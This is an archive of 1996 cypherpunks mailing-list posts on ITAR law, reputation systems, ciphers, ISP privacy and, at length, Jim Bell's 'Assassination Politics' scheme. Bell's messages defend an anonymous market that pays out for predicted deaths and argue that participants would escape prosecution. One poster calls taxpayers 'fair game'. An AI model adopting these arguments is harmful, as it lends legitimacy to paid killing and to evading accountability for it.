Why else would > some ten policemen be arrested? The EU bureaucrats are served by > hordes of prostitutes. Surely there are pedophiles among the hordes. > Probably some EU pedophiles have a connection to the gang. I don't > know this of course, but speculation is cheap. If you want some actual names (remember, for entertainment purposes only!), check out a new book from Flatland called Trance Formation of America, about sex slaves et al. Truly hideous stuff! From bdavis at thepoint.net Wed Sep 25 04:11:40 1996 From: bdavis at thepoint.net (Brian Davis) Date: Wed, 25 Sep 1996 19:11:40 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: Message-ID: On Tue, 24 Sep 1996 s1113645 at tesla.cc.uottawa.ca wrote: > > > On Sun, 22 Sep 1996, Jim McCoy wrote: > > > Brian Davis > > [...] > > >Constitutional literalists take note: the First Amendment says nothing > > >about what the executive branch or the states can do .... > Doesn't the doctrine of limited powers mean that they cannot do what is not > specified? (If I'm not mistaken, IANAL, etc...) > If so, why would we need the First Amendment to protect us from Congress regulating speech? [etc.] And, in any event, the limited powers argument wouldn't apply to the states: "The powers not delegated to the United States by the Constitution, nor prohibited by it to the States, are reserved to the States respectively, or to the people." EBD > > The states are prohibited through the 14th Amendment via the > > Slaughterhouse cases, the ability of the executive branch to > > violate due process is questionable (from a legal viewpoint, not > > a practical one...the President cannot order you placed in jail > > unless you have broken a law which requires congress to have > > made the law in the first place...) > > And the ITARs are only executive orders, no? Not laws, right? I'm curious > as to why they're considered valid. Anyone know? > From tcmay at got.net Wed Sep 25 04:15:01 1996 From: tcmay at got.net (Timothy C. 
May) Date: Wed, 25 Sep 1996 19:15:01 +0800 Subject: Public Schools Message-ID: At 6:40 AM 9/25/96, Jay Gairson wrote: >First off, what does this have to do with cryptography? or anything >cypher for that matter? Nothing, but Dmitri has "different" standards of what is list-relevant than many of us do. >So, basically your saying, since my parents cannot afford to pay for a >private school for me, we are genetically inferior to those who can? >Because hate tell ya, but I've ran into some major idiots that go to >private schools. Also to consider that from the school I go to, last >year we had two perfect sat scores (no problems missed). A minor point: An 800 SAT or Achievement score does _not_ mean "no problems missed." There is some threshold for the percentage of right answers, which varies from year to year and from test to test, above which the score is marked "800." Don't ask me why they do this. (*) This should give you more hope and more determination to get a few 800s when you take the exams. (* Back in 1969 when I was taking these exams and was more neurotically interested in such things, I surmised that the 800 top end was set up to correspond to the IQ = 160 top end reported on some major IQ tests of the time. While some IQ tests are open-ended, resulting in, for example, the dubious claim that Marilyn vos Savant has an IQ of 210 or somesuch, it's more common for tests to have an upper limit, beyond which the results are considered essentially meaningless. So, if one notes that 800 + 800 = 1600, which is exactly 10 times 160, and that the "percentiles" for SAT combined scores of 1500, 1400, 1300, etc. match up with the percentiles for IQs of 150, 140, 130, etc., it's pretty clear what was done with the SAT scoring model. Obviously, many imperfections, some implicit in the nature of tests, some in the whole nature of "IQ" per se. This is why Mensa, which takes (alleged) IQs of 130, also accepts SAT combined scores in that general range (x10, of course). 
Of course, as Roger Gregory puts it, "Mensa is the scum of the cream of the crop.") --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Wed Sep 25 04:53:26 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 25 Sep 1996 19:53:26 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <199609250755.AAA14065@mail.pacifier.com> At 11:50 PM 9/24/96 -0400, Brian Davis wrote: >On Tue, 24 Sep 1996, Rich Burroughs wrote: > >> >> Anyone who mistakes the lack of "repudiations" for AP on the list for some >> kind of tacit approval is not getting the whole picture, IMHO. >> >> Is this how journalists do their research nowadays -- "give me some info or >> I'll write something really bad about you that you'll regret?" Cool. I >> guess I thought there might still be some kind of pursuit of the truth >> involved. >> >> I personally don't have the time or energy to contribute to the AP threads. >> That != approval for the idea. >> >> I hope you include your above quote in your piece. >> > >Amen to that. Add that at least one lawyer (and former prosecutor) on >the list is confident that successful prosecutions will ensue if AP ever >gets off the ground. I don't doubt that there will be harassment. (you can't deny that charges would be brought even if it is tacitly agreed that no crime has been committed; "the harassment-value" of such a prosecution would be desired even if there is ultimately an acquittal.) AP will resemble, more than anything, gambling. 
While gambling is illegal in some areas, it is quite legal in others and there is no reason to believe that locales can't be found in which an AP system could operate legally. Make American laws apply everywhere? That'll be hard to justify, unless you want to unleash a world where all people can be subject simultaneously to the laws of EVERY country, should they choose to enforce them! Would you like to be arrested in Red China for something you said years earlier in America about their leadership? And are you ignoring the fact that the intentional isolation of one participant from the knowledge of the actions and even the identity of the others makes opportunities for prosecution on "conspiracy" charges mighty slim? And since AP can operate across traditional jurisdictional boundaries, you're going to have to explain how you can prosecute Person A in Country B for giving a donation to an organization in Country C, to be paid to a person D in country E for correctly predicting the death of person F in country G, particularly when none of the identities of these people or countries can be easily known given a well-crafted cryptographic and message-routing system. Further, as you probably know as well as any, in order (at least, supposedly!) to get a conviction you need to prove "mens rea," or "guilty mind," and I suggest that none of the more passive participants in the AP system have that. (The ones who DON'T pick up a gun, knife, bomb, poison, etc.) Sure, they are aware that somewhere, sometime, somebody _may_ commit a crime in order to collect a lottery, but they don't know who, what, when, where, or how this will occur, if at all. (either before or after the fact!) In fact, since it is possible for a target to collect the reward himself (to be directed toward his designee, obviously) by committing suicide and "predicting" it, it isn't certain to the other participants that there has even been any sort of crime committed! 
Based on the mens rea requirement, I propose that there is plenty of room for most of the participants to reasonably claim that they are guilty of no crime. They have carefully shielded themselves and others from any guilty knowledge, and presumably they are entitled to protect themselves in this way. Morally, you could argue that these people are countenancing something nasty, in the same sense that somebody could equally well argue that if you buy a cheap shirt in Walmart you're partly responsible for sweatshop labor in El Salvador. True, I suppose, but moral guilt does not always translate into legal guilt. > And yes, I've read Jim Bell's manifesto. The fact >that no lawyer has dissected it from a legal standpoint has been used by >Mr. Bell as support for the proposition that it is legal. I suggest that there is a greater likelihood that the "powers that be" will just abandon all pretense of legality, and attempt to strike at the participants if they can find them without benefit of any sort of trial. This is a more plausible conclusion, because it cuts through all of the legal difficulties which would hinder prosecution. In effect, a low-level undeclared war. Jim Bell jimbell at pacifier.com From dthorn at gte.net Wed Sep 25 04:59:53 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 25 Sep 1996 19:59:53 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] In-Reply-To: Message-ID: <32488A8F.6FF2@gte.net> Sandy Sandfort wrote: > C'punks, > On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > There is no such thing as an "ordinary citizen". When the U.S. > > commits war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, > > Iraq, and elsewhere, > > every American taxpayer is an accomplice and a fair game. > Illogical collectivist claptrap. 
When a taxpayer is targeted by > terrorists, he has been victimized twice--first by the government > that stole his money, second by the terrorist that punished him > for the (alleged) acts others committed with that money. If a > mugger buys a gun with the money he took from me, am I then > responsible for the murder he commits with it? Clearly not. > This line of "reasoning" is nothing more than a sad variant of > the old, "blame the victim" game. For shame. > Let's bring this back to crypto for a moment. Dimitri's "logic" > must necessarily lead one to the conclusion that Cypherpunks (at > least those in the US) are responsible for whatever draconian > restrictions "our" government puts on free speech, crypto or > whatever. John Gilmore, Philip Zimmermann, Whit Diffie and > others will be chagrined to learn this, I'm sure. > Dimitri needs to learn what it means to be an adult. Everyone is > totally responsible for what they do, but ONLY for what THEY do. > No one is responsible for the unassisted, willful acts of others. You are committing a logical fallacy with the above. You're saying that the mugger who commits the crime with a stolen gun is equivalent to my own hired hitmen (the local and federal police I pay so dearly for). This is obviously not the case. I didn't hire the mugger, nor did I encourage the thief in an overt way. But I did consciously select and pay for the police and govt. assassins. And so did you. Unless you're saying that the govt. forcibly takes you down to the voting booth, etc. 
From octobersdad at reporters.net Wed Sep 25 05:50:52 1996 From: octobersdad at reporters.net (T Bruce Tober) Date: Wed, 25 Sep 1996 20:50:52 +0800 Subject: LACC: Encryption and Japan In-Reply-To: <199609240206.WAA20711@raptor.research.att.com> Message-ID: A few months ago I read an article concerning one of the encryption gurus (other than PZ) setting up a company in Japan to create a new encryption program as good as or better than PGP which since it was developed in Japan, wouldn't be subject to ITAR. Actually I think the article indicated he'd already set up the company and developed the software and was getting ready to market it. I think it was Diffie, but can't remember and can't find any info on it. Does anyone here have any info, leads or contact details they can provide me? tbt -- | Bruce Tober - octobersdad at reporters.net - Birmingham, England | | pgp key ID 0x9E014CE9. For CV/Resume:http://pollux.com/authors/tober.htm | | For CV/Resume and Clips: http://nwsmait.intermarket.com/nmfwc/tbt.htm | | | | "Just as the strength of the Internet is chaos, so the strength of our | | liberty depends upon the chaos and cacophony of the unfettered speech the| | First Amendment protects." -- three wise federal judges | From adam at homeport.org Wed Sep 25 06:14:35 1996 From: adam at homeport.org (Adam Shostack) Date: Wed, 25 Sep 1996 21:14:35 +0800 Subject: Taking crypto out of the U.S. In-Reply-To: <19960925054434656.AAA117@IO-ONLINE.COM> Message-ID: <199609251126.GAA10877@homeport.org> Adamsc wrote: | >Theres a personal use exemption. Michael Froomkin's web page has a | >pointer to it. | | What if your laptop gets "stolen"? Or you sell it for a plane ticket home | after your wallet gets pinched? You're required to report it to the Feds. RTFU. -- "It is seldom that liberty of any kind is lost all at once." -Hume From tcmay at got.net Wed Sep 25 06:27:49 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 25 Sep 1996 21:27:49 +0800 Subject: Not reputation again! 
(Was: The Nature of the Cypherpunks List) Message-ID: At 6:45 AM 9/25/96, Greg Burk wrote: >I know, I said I was through arguing "reputation theory" and I really >thought I was, but this latest impelled me to say more. > >tcmay at got.net (Timothy C. May) writes: >> --Tim May, whose reputation is, like the list, whatever it is, for whatever >> reasons, and who thus needs no defenders > >Indeed, your reputation needs no defenders among those of us who know >you directly (if electronically) > >But here's something for you to think over: If there are such things as >negative reputations, why hasn't your reputation zoomed to godlike >status upon the ... let us say unreserved... condemnations of the >Poster With Nothing Better To Do, if s/he has a negative reputation (I >presume you would say so) First off, I certainly don't know what the precise "calculus of reputations" looks like. That is, how it adds, subtracts, how the reps of others factor in, etc. I think studying how it might work--and how it compares to other fields, such as movie reviews, music reviews, book reviews, etc.--might be an excellent Masters-level thesis for someone in sociology or even CS (if done with the proper slant). However, I would never think the calculus is something so simplistic as: "I rate Alice's reputation as very negative. Alice just said some bad things about Bob. Therefore, Bob's reputation will go up a great deal." More likely, something like: "Alice just said a bunch of things bad about Bob. Cool. Maybe this Bob person deserves a look." In other words, smaller steps, with diminishing returns. And with few sudden movements, except by direct judgment. >Or you could contend that there's no such thing as collective >reputation, but I think there are two major flaws: His/her 1-to-1 >"reputations" clearly add up to a collective consensus among us annoyed >cpunk readers. Even if you contend that reputations in general do not >behave collectively, it is no defense in this case at least. 
And I think
>if "reputation theory" predicts no collective behavior, it must be
>pretty weak.

I believe that, to first order, reputation is a tensor. Given N people, imagine this matrix:

           Alice    Bob  Charles  Daphne   Earl  Fiona  Gloria  Harold
Alice       .99   -.21     .75     .94     .94    .83    -.03     .22
Bob         .72    .96    -.02     .85     .71   -.60     .10     .32
Charles     .82    .02     .97     .90    -.50    .42    -.10     .70
Daphne      .45    .87     .23     .92     .74    .87     .11     .23
Earl        .89    .54     .34     .90     .95    .23     .23     .46
Fiona       .87    .50     .32     .68    -.34    .97     .78    -.15
Gloria      .59    .78    -.23     .15     .29   -.30    -.80     .51
Harold      .65    .03     .34     .78     .51   -.76    -.51     .97

This can be read thusly: Alice has a .99 rating of her own self, a negative .21 rating of Bob (or Bob's opinions, or his posts, or whatever is being rated), and so on. Bob has a .72 rating of Alice, a .96 rating of himself, etc.

"Alice(Bob) = -.21"

Now in this example I made up, some various observations can be made. Nearly everyone rates Harold pretty low, except for Harold. Thus, Harold's own opinions of others, if expressed, probably won't change too many other opinions. Nearly everyone rates Daphne very highly, and her opinions are read carefully. However, Gloria does not rate Daphne highly...but then Gloria rates her own stuff a negative .80, so Gloria has some psychological issues to deal with and others typically rate her pretty low. And so on.

In the real world, I think we can see how such a matrix could be constructed, based on either direct inputs (votes) from people, or based on their apparently positive or negative comments, etc. (For example, it is fairly obvious that I might give Hal Finney a rating of .90, and Vulis a -.90. And so on, for others.)

Now is there a "collective reputation"? There are various additive properties, with easily understandable meanings. (If Harold is in a lot of kill files, this says a lot, for example.)

Anyway, as I said before, the "calculus of reputations" is not worked out, so far as I know. 
Some weeks back I suggested that the mathematics of belief as developed in "Dempster-Shafer belief theory" has some nice properties that make it seem a promising area to look into. .... >Because s/he can *never spend reputation down to zero*. So you say. I see no reason reputations cannot be negative, in the sense that not only do I take the opinions of such a person very seriously, I tend in fact to believe the opposite opinion is more likely. This is a "negative" reputation. Thus, a reputation can be "spent down" to zero, and below. >Frankly, I think you should just admit that your reputation theory is >flawed and rethink it. I would be interested in hearing it, but what you >have now is IMHO badly flawed. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From stewarts at ix.netcom.com Wed Sep 25 07:10:48 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 25 Sep 1996 22:10:48 +0800 Subject: SAY WHAT? [Assassination NOISE] Message-ID: <199609250730.AAA25890@dfw-ix12.ix.netcom.com> An earlier generation of Assassination Politics set the public's stereotype view of "anarchists" for the next hundred years. Do we really want to do it again? Perhaps the public will realize that we're not lefty-anarchists, we're the Totally Unified Cypherpunk Anarcho-Capitalist Movement... Someone, probably Simon Spero said: >= .Assassination politics is impossible to defend from a classical >= .Liberal/Libertarian position. Bell advocates arbitrary applications >= .of violence and coercion without restriction. 
There is no way to >= .justify the initiation of force without abandoning any pretence of >= .being a Libertarian (which, to be fair, Bell doesn't claim to be). Bell, like X, is proposing mechanism without built-in policy, as well as suggesting some potential policy implementations. If you use the mechanism to sponsor assassination of people who have initiated force against you, you're only using retaliatory force, not initiating it. On the other hand, the mechanism also can be used against people who haven't initiated force against the sponsor - even against politicians who have refused to get the country into misguided but popular wars or judges who have refused to convict innocent but wrong-colored defendants. Like democracy, it's a really terrible system, and like democracy, there are some alternatives that aren't worse :-) Maybe even democracy. It's at least as appalling an idea as government. If it does catch on, and I suspect that the technology will certainly make it possible, I hope that most of the public will have enough sense and decency not to pay for murdering people who don't deserve it, so assassins will find more of a market for killing people who do, and that the lower-paid assassins who kill undeserving people will be less competent and get caught like most stupid bank robbers do. But there are enough Drug-War-Loving Americans that I doubt it. And there's enough intersection between the morality-challenged and the financially-challenged fellow Americans down on their luck that some of them will take a break from robbing liquor stores for drug money to make bigger bucks serving the desires of the public that the high-tech lynch mobs will have people they can hire. Not everybody needs Mario Greymist to get some basic "work" done. Glory of the market, matching up supply and demand. And attila replied > all very true. but I will defend Jim Bell's rights to propose > them, even if Bell is more than a few cards short of a full deck. 
Sure, he's got the right to, and if I run a remailer again he's welcome to use it to discuss AP (though not to propose assassinations....) Doesn't mean I want to encourage this sort of thing, though. Remailers can damn well afford to be choosy, and I'll bet 5 zorkmids that the first person to use my remailer for assassination doesn't last a month. (Oh, wait...) # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From junger at pdj2-ra.F-REMOTE.CWRU.Edu Wed Sep 25 08:01:12 1996 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Wed, 25 Sep 1996 23:01:12 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <3.0b19.32.19960924160043.006edf48@ricochet.net> Message-ID: <199609251126.HAA23625@pdj2-ra.F-REMOTE.CWRU.Edu> Greg Broiles writes in a most informative posting: : And that's what the ITAR is - a body of administrative law developed by the : executive branch pursuant to a grant of power from Congress. (e.g., 22 USC : 2778(a)(1), ". . . The President is authorized to designate those items : which shall be considered as defense articles and defense services for the : purposes of this section and to promulgate regulations for the import and : export of such articles and services. The items so designated shall : constitute the United States Munitions List.") It is subject to review by : the courts just like the product of Congress itself; and an agency can't do : something Congress can't do, like write an unconstitutional law. It should be added though that most administrative regulations are subject to judicial review by courts to make sure that they comply with the law passed by Congress. The ITAR, on the other hand, are not subject to this sort of review and can only be challenged in the courts on Constitutional grounds. -- Peter D. 
Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu URL: http://samsara.law.cwru.edu From bryce at digicash.com Wed Sep 25 08:44:35 1996 From: bryce at digicash.com (bryce at digicash.com) Date: Wed, 25 Sep 1996 23:44:35 +0800 Subject: reputation, e.g. www.ffly.com (was: Not reputation again! (Was: The Nature of the Cypherpunks List) ) In-Reply-To: Message-ID: <199609251219.OAA28483@digicash.com> -----BEGIN PGP SIGNED MESSAGE----- It's silly to conflate ratings of people with ratings of people's opinions with ratings of people's ratings of etc. Some of the people I work with have awful opinions on politics, other people, music, movies, books, and food, but great opinions on computer hardware, algorithms and programming languages. But their ratings as people are generally very high. (Insert inaccurate but amusing joke to the effect that if someone has good taste in restaurants they are likely to have poor taste in video cards, or some such.) Check out Firefly (www.ffly.com). (Cpunk comment: they only track your ratings by nym, no True Name required.) Firefly has the "if I agreed with Bob a lot in the past on this subject, I'll probably agree with him again" heuristic. It appears to be a pretty ugly heuristic when applied to me. Ffly keeps trying to suggest music which is in the same _genre_ as music I have previously recommended, but what I am interested is music that is similarly _good_. My tastes don't correspond well to genres. But this is a mere anecdotal impression. Give it a spin. I wrote in the suggestion box that they add meta-ratings (especially ratings on the little "movie reviews" submitted by other FFly users). Some guy wrote back (same day!) that they were planning on it. 
Regards, Bryce -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2 iQB1AwUBMkkjQkjbHy8sKZitAQF5wAL/WgD5iPOR7RtCc5SNgLMGqKUJqHLiS7bM XItX4p8Z1Uri5DZgAUoOCDZ7iEoP3rleDBThGq3rFG8y6I9tbFueC00TRwoft5rb fR7pqeaDj2AzcSt4rYCi67ucsW4wQi1C =rL1w -----END PGP SIGNATURE----- From bdavis at thepoint.net Wed Sep 25 08:48:04 1996 From: bdavis at thepoint.net (Brian Davis) Date: Wed, 25 Sep 1996 23:48:04 +0800 Subject: ISPs' information on users In-Reply-To: Message-ID: On Tue, 24 Sep 1996, Timothy C. May wrote: > At 8:18 PM 9/24/96, Robert Hettinga wrote: > >--- begin forwarded text > > >> ** So Much Fuss About A Bottle Of Ketchup > >> > >> Hungarian police recently sent a fax around to the local Internet > >> service providers (ISPs) asking them to provide lists of their users > >> in Esztergom, a small town outside of Budapest. It seems somebody > >> had planted a bomb in a bottle of ketchup. Since everyone knows you > >> can download bomb-making instructions from the Internet, the police > >> figured they should investigate the local users. No, I'm not making > >> this up. > > So, Hungary has GAK -- Government Access to Ketchup. > > Good to know the 57 Varieties are now considered munitions. > > On a more serious note, perhaps legal experts here could comment on > something I've been wondering about. Could ISPs in the UlS. be compelled to > report on the browsing and net surfing habits of their customer base? > > To make this clear, I don't mean in a specific criminal case, where the > records are searchable under a warrant. I mean a blanket order that all > ISPs compile and forward records. > > Were I an ISP, I would probably say, "Hell no! They're my records and the > Fourth Amendment says my records are to be secure unless a proper court > order is issued. Besides, my fee for generating each kilobyte of records is > $100,000, nonnegotiable." 
> > (I think I've answered my own question, namely, ISPs would be under no > obligation to report on customer activities, absent a proper warrant, and > consistent with the ECPA.) > > However, ISPs are _not_ accorded the same status as priests, lawyers, and > others with such privacy privileges (and obligations). Would it be legal > for an ISP to offer for sale such records? Or to voluntarily go to the > cops? Worse for the ISP (and better for its customers), such interception would violate ECPA, as the 18 U.S.C. Section 2511(2)(a)(i) exception for interceptions by electronic communications services would not apply to protect the ISP. One could hardly (successfully) argue that selling out its customers was a "necessary incident" to the rendition of the ISP's services. Indeed, the exception also states "that a provider ... shall not utilize service observing or random monitoring except for mechanical or service quality control checks. I know. They could use the exception to give away a little bit, but not the whole enchilada. EBD > > (There's a certain new ISP with tight links to a quasi-religious group much > in the news lately, and some have speculated that this ISP may be > monitoring certain users....) > > --Tim May > > > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > > From declan at eff.org Wed Sep 25 08:54:10 1996 From: declan at eff.org (Declan McCullagh) Date: Wed, 25 Sep 1996 23:54:10 +0800 Subject: Lexis and Privacy - Bill approaches. 
In-Reply-To: Message-ID: This would be good if the bills were written well and thoughtfully. Unfortunately, they explicitly extend executive branch regulatory jurisdiction to the Net. At least the one I read did; I understand there are multiple versions. -Declan On Tue, 24 Sep 1996, Black Unicorn wrote: > > Pressure from the FTC Which fielded hundreds of complaints about Lexis and > the social security number scrap) has prompted members of the Banking > Committee to add provisions to the most recent spending bills which > protect personal information (including social security numbers, phone > numbers, addresses, and so forth) under the Fair Credit Reporting Act. > This limits access to this information to credit agencies and otherwise > authorized entities. (Of which I assume Lexis is not one). > > It's not great protection, but it's something. > > I urge everyone to take their own measures to protect personal data > regardless of what some piece of paper on a library shelf says is > protected. The only real protection is not to allow release of the data > in the first place. > > -- > I hate lightning - finger for public key - Vote Monarchist > unicorn at schloss.li > // declan at eff.org // I do not represent the EFF // declan at well.com // From osborne at gateway.grumman.com Wed Sep 25 09:16:41 1996 From: osborne at gateway.grumman.com (Rick Osborne) Date: Thu, 26 Sep 1996 00:16:41 +0800 Subject: An idle thought on CBC and block lengths Message-ID: <3.0b19.32.19960925085644.0068cb90@gateway.grumman.com> So I was sitting bored at home and thinking to myself: CBC is cool. Without the key, you're screwed because a single bit error propagates throughout the entire message. But then I was thinking, yeah, but you can still eventually get the ONE key. So I began to wonder what the difference in security is between encrypting an entire M with just one K in CBC, or encrypting M with permutations of K over specific block lengths. 
On the one hand you've got just one key, which makes it that much harder to find in the keyspace. On the other hand, if evil interloper Eve gets her hands on it, she has to find all of the keys to get all of M. (Assuming she is using brute force and can't necessarily find the master K to permute into the subkeys.) The downsides are of course that on the one side you've got just one key, and once you get it, you get M. But on the other hand, you can get any one part of the message with less difficulty because of the higher number of keys. And, of course, if your master K is easy to brute force, then it's actually worse than the first option. Does anyone have opinions / knowledge of which is better? ____________________________________________________________ Rick Osborne osborne at gateway.grumman.com "The universe doesn't give you any points for doing things that are easy." From dlv at bwalk.dm.com Wed Sep 25 09:21:32 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 26 Sep 1996 00:21:32 +0800 Subject: WARNING: This Message Actually Contains a Question In-Reply-To: <199609250610.XAA23137@dfw-ix12.ix.netcom.com> Message-ID: Bill Stewart writes: > Bruce Schneier's book Applied Cryptography discusses > Blowfish (no surprise, since it's his algorithm) and > I think also discusses GOST. Blowfish is very fast > once you've finished the (deliberately slow) key schedule. > It appears to be tolerably strong, though there hasn't > been as much analysis on it as on RC4 or IDEA yet, much less DES. A widely available C implementation of Blowfish had a bug, weakening its security under some circumstances. Make sure to use the corrected version. (The bug was in the C program, not the algorithm itself.) 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From pjb at ny.ubs.com Wed Sep 25 09:35:41 1996 From: pjb at ny.ubs.com (pjb at ny.ubs.com) Date: Thu, 26 Sep 1996 00:35:41 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609251240.IAA14357@sherry.ny.ubs.com> Adam, you know the german government did not win this one, and i know that they did not win, my point was, will they, and other governments take this as a win and be encouraged to press their luck with someone else. -paul > From aba at dcs.ex.ac.uk Wed Sep 25 02:45:54 1996 > Date: Tue, 24 Sep 1996 17:21:16 +0100 > From: Adam Back > To: pjb at ny.ubs.com > Cc: cypherpunks at toad.com > Subject: Re: We removed radikal 154 from xs4all :( > Content-Length: 989 > > > Paul writes: > > i was under the impression that germany's goal was to stop the distribution > > of radikal 154 by xs4all, not by 50 mirror sites. they seem to have > > accomplished their goal. do you really think that they will let a little > > thing like reason stand in their way when claiming victory? > > They lost: it is still available. If they went after another mirror > the number of mirrors would double :-) > > Someone in the German press needs to rub their noses in the fact that > they lost, say by printing a list of URLS, or just mentioning the > number of mirrors, and the different countries they are located in. > > They need to translate the quote: > > `The internet sees censorship as damage, and routes around it' > > and put that in big letters. > > Any German net freelance journalists reading? > > Adam > -- > #!/bin/perl -sp0777i $/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1 > lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/) > From PhneCards at aol.com Wed Sep 25 09:54:22 1996 From: PhneCards at aol.com (PhneCards at aol.com) Date: Thu, 26 Sep 1996 00:54:22 +0800 Subject: Stop Spammers Today! 
Message-ID: <960925085324_292805914@emout19.mail.aol.com> Dear cypherpunks; In the last few days I have received numerous email coming from you but with fake return addresses from messages posted on newsgroups. I must have been targeted because I am a bulk emailer. Letting you know now that I am a legitimate bulk emailer compiling my list with the permission of each account holder. If this barrage of email does not cease immediately, I will be forced to take legal and maybe not so legal actions to defend myself. If you would like to discuss this further, please call me at 407-438-8892. Tim =================================================== >Sender: owner-cypherpunks at toad.com >To: cypherpunks at toad.com > >Timothy C. May wrote: >> >> At 2:10 AM 9/24/96, hallam at vesuvius.ai.mit.edu wrote: >> >> >like Markof are somewhat more responsible. This is not going to stop me >> >from producing an op-ed piece linking the net libertarians to >assassination >> >politics unless I hear a few more repudiations of Bell's ideas. If you >> >don't very clearly reject his murderous ideas you are going to regret it >> >just as the left regretted having the USSR or the RAF associated with them. >> >> I for one don't respond well to extortion threats, so write your damned >article. > >Seconded. > >You know, the real problem with the average blackmailer is that they >rarely give you the offer as a legal document - if we fulfil our side of >the bargain, how can we be sure he fulfils his, and doesn't change his >mind next time someone half agrees with a pro >AP/Legal-blackmail/Tax-haven/Libertarian-state/freedom-of-speech/whatever >post? We obviously need some sort of legal contract to solve this >problem, but no, that's not possible in most countries, is it? How >convenient. Till next time Phill ... > >Gary >-- >"Of course the US Constitution isn't perfect; but it's a lot better >than what we have now." -- Unknown. 
> >pub 1024/C001D00D 1996/01/22 Gary Howland >Key fingerprint = 0C FB 60 61 4D 3B 24 7D 1C 89 1D BE 1F EE 09 06 From richieb at teleport.com Wed Sep 25 10:01:05 1996 From: richieb at teleport.com (Rich Burroughs) Date: Thu, 26 Sep 1996 01:01:05 +0800 Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!] 
Message-ID: <3.0b24.32.19960925063908.006821ec@mail.teleport.com>

At 12:23 AM 9/25/96 -0700, Dale Thorn wrote:
[snip]
>I understood the intent of AP was to take powers the government is
>already exercising (unconstitutionally), and merely transfer some of
>them to the people, as it were.
[snip]

I always thought that the intent of AP was to bore me to tears and fill up my mailbox with rubbish :)

Rich

______________________________________________________________________
Rich Burroughs richieb at teleport.com http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause

From bdavis at thepoint.net Wed Sep 25 10:36:01 1996
From: bdavis at thepoint.net (Brian Davis)
Date: Thu, 26 Sep 1996 01:36:01 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <199609250755.AAA14065@mail.pacifier.com>
Message-ID:

On Wed, 25 Sep 1996, jim bell wrote:

> At 11:50 PM 9/24/96 -0400, Brian Davis wrote:
> >...
> >Amen to that. Add that at least one lawyer (and former prosecutor) on
> >the list is confident that successful prosecutions will ensue if AP ever
> >gets off the ground.
>
> I don't doubt that there will be harassment. (you can't deny that charges
> would be brought even if it is tacitly agreed that no crime has been
> committed; "the harassment-value" of such a prosecution would be desired
> even if there is ultimately an acquittal.) AP will resemble, more than
> anything, gambling. While gambling is illegal in some areas, it is quite
> legal in others and there is no reason to believe that locales can't be
> found in which an AP system could operate legally.

By "successful prosecutions" I mean convictions. You can call a cow a duck, but it's still a cow.

> Make American laws apply everywhere?
> That'll be hard to justify, unless you

You obviously are unfamiliar with the established concept of extraterritorial jurisdiction.

> want to unleash a world where all people can be subject simultaneously to
> the laws of EVERY country, should they choose to enforce them! Would you
> like to be arrested in Red China for something you said years earlier in
> America about their leadership?
>
> And are you ignoring the fact that the intentional isolation of one
                                         ^^^^^^^^^^^
Are you ignoring the principle of "willful blindness"?

> participant from the knowledge of the actions and even the identity of the
> others makes opportunities for prosecution on "conspiracy" charges mighty
> slim. And since AP can operate across traditional jurisdictional

I'm curious as to your qualifications to make the "mighty slim" judgment ...

> boundaries, you're going to have to explain how you can prosecute Person A
> in Country B for giving a donation to an organization in Country C, to be
> paid to a person D in country E for correctly predicting the death of person
> F in country G, particularly when none of the identities of these people or
> countries can be easily known given a well-crafted cryptographic and
> message-routing system.

Be glad to. How much can you afford?

>
> Further, as you probably know as well as any, in order (at least,
> supposedly!) to get a conviction you need to prove "mens rea," or "guilty
> mind," and I suggest that none of the more passive participants in the AP
